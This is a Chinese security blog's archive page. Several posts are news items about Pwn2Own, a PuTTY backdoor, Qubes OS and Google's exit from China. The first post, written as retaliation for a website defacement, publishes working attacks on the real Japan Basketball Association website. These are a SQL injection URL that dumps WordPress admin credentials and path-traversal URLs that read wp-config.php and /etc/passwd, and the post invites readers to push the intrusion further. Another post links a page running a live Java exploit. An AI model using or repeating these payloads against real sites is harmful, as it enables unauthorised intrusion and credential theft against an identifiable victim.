存档

‘业界资讯’ 分类的存档

日本入侵中国篮协网站,其日本篮协网站同样存在漏洞

2012年11月8日 7 条评论

    前因:

    2012年11月7日,中国篮协官网主页上部背景被改成黑色,并出现了包含“钓鱼岛”和部分侮辱性言辞的日文词句。网页中间还出现了日美两国的国旗。

    看到这个微博后,就想看看日本篮协网站的安全性到底如何?

    日本篮协网站(www.japanbasketball.jp)功能比较简单使用了开源系统WordPress,WordPress总体上安全性较高,出现漏洞一般情况也是在插件上,所以本以为日本篮协网站的安全性应该很高,但在网站上随意点了几下后,让我大为惊叹,漫山遍野注入漏洞……

1 、SQL注入

    注入漏洞较多,随便点点都可以发现,选择了一个支持union的点,可以直接暴出WordPress管理员用户名和密码,代码如下:

    http://www.japanbasketball.jp//wintercup/2012/team_detail.php?team_id=100454&event_id=118/**/and/**/1=5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat%280×232323,user_login,0x2d2d2d,user_pass,0x2d2d2d,0×232323%29,16,17,18,19,20,
21,22%20from%20wp_users

2、任意文件查看漏洞

    漏洞地址:https://www.japanbasketball.jp/alljapan/2011/image_display.php?p=image_display.php


<?
$image_path =$_GET['p'];

if (file_exists($image_path)) {
header('Content-Type: image/jpeg');
readfile($image_path);
}

?>

    $image_path未经过任何限制,直接使用readfile调用,导致漏洞产生。

    查看网站源码:

    https://www.japanbasketball.jp/alljapan/2011/image_display.php?p=../../wp-config.php

    查看/etc/passwd:

    https://www.japanbasketball.jp/alljapan/2011/image_display.php?p=../../../../../../../../../../etc/passwd

    有了这二个漏洞,继续渗透的思路就很开阔了,就是时间的问题了,比跨库查询、通过注入获取所有表内容、查看网站数据库配置文件、获取服务器中apache、ftp等配置文件、有时间和兴趣的同学可以练练手。

    只想对告诉日本,在入侵我们篮协的同时,其实你们自己篮协的网站同样不安全。本文没有任何技术含量,如果日本篮协网站被篡改,与007安全无关!

在线检测电脑是否存在Java漏洞

2012年9月4日 6 条评论

作者:不走的钟

来源:http://www.007hack.com/?p=805

一个新型的JAVA高危漏洞已被国外黑客网站公开,影响包括微软Windows和苹果Mac OS在内的所有操作系统。一旦装有JAVA组件(JDK/JRE)的浏览器访问恶意网页,木马将在用户毫无察觉间植入电脑,此挂马漏洞正在飞速传播,请广大网友注意。
本站提供在线漏洞检测电脑是否存在此漏洞,访问网页即可检测该电脑是否存在漏洞

提示:本页面会执行Java漏洞的exp,演示打开计算器,有的杀病毒软件可能会提示存在病毒,说明你的杀病毒软件已经可以拦截该漏洞了。
url:http://www.007hack.com/tool/java_exp_test.html
不存在漏洞,如下图:

存在漏洞,并自动打开计算器,如下图:

安全是相对的-Chrome浏览器最终被黑客攻破

2012年3月8日 2 条评论

         还记得之前Google悬赏百万美元来让大家黑Chrome的消息吗?现在Google真的要乖乖掏这笔钱了。在正在举行的Pwn2Own年度黑客大赛上,Chrome不幸成为了第一个被黑客攻破的浏览器。

        Pwn2Own是CanSecWest在温哥华组织的一年一度的网络系统安全大会,大会上黑客们可以通过系统本身的漏洞破坏系统的安全防护从而完全控制系统。虽然在过去三年的Pwn2Own大会上,Chrome是唯一 一个没有被攻破的浏览器。但这次比赛刚刚开始5分钟,Chrome就被上届第一个攻破Safari浏览器的Vupen黑客团队破解。

阅读全文…

中文版Putty 后门分析

2012年1月31日 4 条评论

作者:不走的钟

  今天IT行业微博热点 中文Putty多款软件存在后门,有的说被绑马,有后门众说纷纷。简单地说软件后门可以分为二种:

  一、正常软件与木马进行捆绑,当用户运行软件时,木马或者病毒自动运行,用户不知不觉便中了招。

  二、在软件代码中加入了特殊代码,让软件有“特别”的功能,如发送口令到指定服务器,完成木马功能。

阅读全文…

女黑客开发新的安全操作系统Qubes

2010年4月14日 没有评论

ubes的最大优点就是安全。它充分利用了虚拟化技术(基于安全虚拟机Xen),所有用户应用程序都运行在AppVM(基于Linux的轻量级虚 拟机)中,彼此隔离。而联网代码使用IOMMU/VT-d放在一个非特权虚拟机中,在特权域 (dom0) 中没有任何联网代码。许多系统级组件放在沙盒中,以避免互相影响。

据Slashdot 报道,著名的波兰美女黑客Joanna Rutkowska最近发布了一个基于Xen、X和Linux的新开源操作系统,称为Qubes。

Qubes的最大优点就是安全。它充分利用了虚拟化技术(基于安全虚拟机 Xen),所有用户应用程序都运行在AppVM(基于Linux的轻量级虚 拟机)中,彼此隔离。而联网代码使用IOMMU/VT-d放在一个非特权虚拟机中,在特权域 (dom0) 中没有任何联网代码。许多系统级组件放在沙盒中,以避免互相影响。

 

另外,Qubes允许用户自己定义许多安全域(用轻量级虚拟机实现),比如“个人”、“工作”、 “购物”、“银行”等,彼此隔离。另外,也支持各安全域之间复制-粘贴和文件共享。

 

虽然这个操作系统仍然处于早期开发阶段,但是由于Joanna的声望,它还是引起了社区的广 泛关注。有评论认为,这一想法很有新意,但还算不上革命性的产品。

据Joanna在博文中介绍,这个操作系统已经可以使用,她自己大部分日常工作 都在之上完成,包括该操作系统本身的开发。

项目首页:http://qubes-os.org/Home.html(不 稳定)
Joanna Rutkowska,著名 波兰安全研究人员,擅长底层安全和恶意软件方面的研究。她小学时就对操作系统内核产生了兴趣,学习了DOS汇编语言。后来转向 Linux系统和内核开发。

2006年8月她在Black Hat Briefings会议上发表了对Vista内核保护机制的攻击方案(破解了驱动认证机制并植入一个Rootkit),引起轰动,被《eWeek Magazine》评为2006年五大黑客。此外,她的著名作品还包括绰号Blue Pill(蓝色药丸)的技术,用硬件虚拟化将一个正在运行的操作系统移到虚拟机中。

2007年她创立了非盈利性的机构Invisible Things Lab。主要关注操作系统和虚拟机方面的安全问题。

2009年,她又曝光了Intel CPU上的一个缓存漏洞。

分类: 业界资讯 标签:

谷歌今晨宣布退出中国内地市场

2010年3月23日 3 条评论

今日凌晨,谷歌公司正式宣布将搜索服务退出中国内地市场。北京时间3月23日凌晨3时零3分,谷歌公司高级副总裁、首席法律官大卫·德拉蒙德公开发表声明,再次借黑客攻击问题指责中国,宣布停止对谷歌中国搜索服务的“过滤审查”,并将搜索服务由中国内地转至香港。

     不过谷歌也表示,尽管搜索服务转至香港,但是该公司打算继续在中国的研发工作,并将保留在中国的销售业务。对于手机行业来说,谷歌打造的Android操作系统正在如日中天的发展,根据美国的统计数据来看,2009年Android手机在美国的市场占有率已经接近10%,他们预测Android手机2010年在美国的市场占有率将有机会超过18%,直逼iPhone

      国务院新闻办网络局负责人就谷歌退出中国内地市场指出,外国公司在中国经营必须遵守中国法律。谷歌公司违背进入中国市场时作出的书面承诺,停止对搜索服务进行过滤,并就黑客攻击影射和指责中国,这是完全错误的。我们坚决反对将商业问题政治化,对谷歌公司的无理指责和做法表示不满和愤慨。 该负责人同时指出,中国政府鼓励互联网发展和普及,促进互联网对外开放。中国互联网上的交流和言论十分活跃,电子商务等发展迅速。事实证明,中国互联网的投资环境、发展环境是好的。中国将坚定不移地坚持对外开放的方针,欢迎外国企业参与中国互联网发展,并为外商到中国经营发展提供良好服务。中国互联网依然会保持快速发展的势头。

     据媒体报道,美国国家安全委员会(National Security Council)发言人Mike Hammer周一称,谷歌与中国政府未能达成让google.cn网站继续运营的协议,白宫对此感到失望。
    有业内人士对速途网称,谷歌退出中国内地市场,经过几个月的传言,各界对此已经有足够的预测,各方反应,基本上可以说是波澜不惊。从未来看,谷歌退出内地市场,对于中国互联网搜索引擎市场来讲,将会提供搜索行业格局重新洗牌的一个契机。